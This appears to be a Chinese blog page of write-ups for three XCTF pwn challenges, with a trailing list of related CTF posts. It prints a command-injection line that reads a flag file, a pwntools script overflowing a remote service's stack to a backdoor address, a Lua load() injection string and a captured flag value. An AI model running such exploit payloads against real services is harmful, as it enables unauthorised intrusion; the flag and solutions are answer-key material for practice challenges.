这个题不会,搜了下wp原来这么简单,一直用js都是写网页,没用过os库

题目是个大文件,基本没法看。运行后出提示符,打help有点提示。

其实就是个js的解释器,直接运行命令就能拿到flag

js> os.system('cat flag')
os.system('cat flag')
cyberpeace{fbbe21cdff06b6bb983a88c58185de99}
js> 

warmup

这个题有后门,有溢出,直接溢出到返回地址写后门

from pwn import *p = remote('111.200.241.244',62270) #node3.buuoj.cn
p.sendafter('>',b'A'*0x48 + p64(0x40060d))
p.interactive()

20和8应该属于同一类,那个是js这个是lua。同样不用写东西。复制了一段网上搜到的exp,从头到尾说完,实际上就是最后执行那一句

SOLUTION
--------The player is expected to follow a deductive path:1. Connect and try the commands.
2. Discover that 'help' actually return some binary data.
3. Upon analysis the player realizes that binary data is compiled LUA script.
4. The LUA script will not decompile because it is corrupt.
5. Comparing is own trials, the player will discover that the header is missing the first byte.
6. Once the header is fixed the player uses unluac tool to decompile.
7. After auditing the code, the player noticed the injection.
8. use `load('lines = io.lines("flag")\n for l in lines do writeline(l) end') -- ` string to obtain the key. There maybe more be more than one solution.

[XCTF-pwn] 8-monkey 9-warmup 20_csaw-ctf-2016-quals-aul相关推荐

  1. [SECCON CTF 2016 Quals] Chat 分析与思考

    CTFSHOW吃瓜杯,PWN方向第三题竟是SECCON原题,于是当时没有仔细研究,直接套用了其他大佬的EXP(第二第三第四题都是各大比赛的原题,网上可以直接找到写好的EXP......) 既然现在比赛 ...

  2. CSAW CTF 2016 PWN quals-warmup

    CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py fla ...

  3. XCTF pwn例题思路整理 侵删

    XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1") 处理报错 2 read() 栈溢出 函数定义:ssize_t read(int fd, void ...

  4. HITCON CTF 2015 Quals Web 出題心得

    Blog: http://blog.orange.tw p.s. 相關代碼皆放在 Github 上,有興趣研究之同學可以先看看代碼嘗試解解看後在敘述! 寫在 HITCON CTF 2015 Quals ...

  5. xctf pwn Aul

    对于这道题我- binbin@ubuntu:~$ nc 111.198.29.45 33083 let's play a game | 0 0 0 0 0 0 0 0 | | 0 1 0 0 0 0 ...

  6. [CTFTraining] ASIS CTF 2019 Quals Unicorn shop

    阿米尔卡比尔大学信息安全与密码学研究小组夺旗赛 ​ 我们随便买一件商品,1~3都显示: ​ 只有第4个显示: ​ 只允许输入一个字符,题目叫Unicorn,猜测为Unicode.在Unicode - ...

  7. [Bugku CTF——Pwn] pwn2

    [Bugku CTF--Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 explo ...

  8. [Bugku CTF——Pwn] pwn4

    [Bugku CTF--Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadge ...

  9. [Bugku CTF——Pwn] pwn1

    [Bugku CTF--Pwn] pwn1 题目地址:https://ctf.bugku.com/ 额, 直接nc连接上,就可以直接得到shell 好水哦,新手玩玩就好,老鸟勿喷 无语凝噎 cat f ...

  10. CTF pwn题堆入门 -- Unsorted bin

    Unsorted bin 序言 概述 攻击方式 unlink 释放Chunk到Unsorted bin House of Orange House of einherjar Unsorted bin ...

最新文章

  1. SCOM2012部署系列之七:推送Windows监控代理
  2. “理想智造”品牌首次面世 新造车势力车和家正式上场
  3. leetcode 66. 加一(C语言)
  4. 博客链接—Python
  5. Docker第三方项目小结
  6. docker安装jdk1.8
  7. 2019年5月的Flag!
  8. 80c51流水灯程序汇编语言,stc89c51单片机流水灯程序.doc
  9. 深入学习D3JS:d3-array Statistics部分 d3.min, d3.max,d3.extent,d3.sum,d3.scan,d3.ascending,d3.deviation
  10. 蒲丰投针实验原理_蒲丰投针原理.DOC
  11. 玩转aws之(二)eks 设置efs(nfs)存储卷pvc
  12. 系统设计之时间维度[数据仓库]
  13. java 批量文件编码转换 GBK to UTF-8(swing界面)
  14. 计算机共享打印机怎么弄,电脑共享打印机怎么设置,手把手教你设置共享打印机...
  15. Modelsim仿真流程及相关命令
  16. crout分解计算例题_如何计算有理函数的不定积分
  17. delegation机制
  18. 用“XML解析开发包Jaxp”对XML文件进行Dom方式的CRUD操作
  19. 【机器学习】一张机器学习算法的思维导图
  20. 20145204张亚军《网络对抗技术》恶意代码分析

热门文章

  1. python Selenium浏览器爬虫指南 --未完成版本
  2. 博客系统(cnblog)
  3. 奇迹mu登录器工具和网站文件配置
  4. C#练习题答案: scytale的编码器/解码器(古斯巴达密码)【难度:3级】--景越C#经典编程题库,1000道C#基础练习题等你来挑战
  5. excel冻结窗口_你会Excel吗?14个Excel神奇功能+8个Excel小技巧+Excel常见快捷键,提升办公效率...
  6. Java基础题(三)
  7. 聊聊Javascript的事件循环
  8. 计算机专业英语这门课学什么内容,计算机专业英语(学术能力培养)
  9. 我有一台云服务器,可以干什么?
  10. 一行代码可以做什么?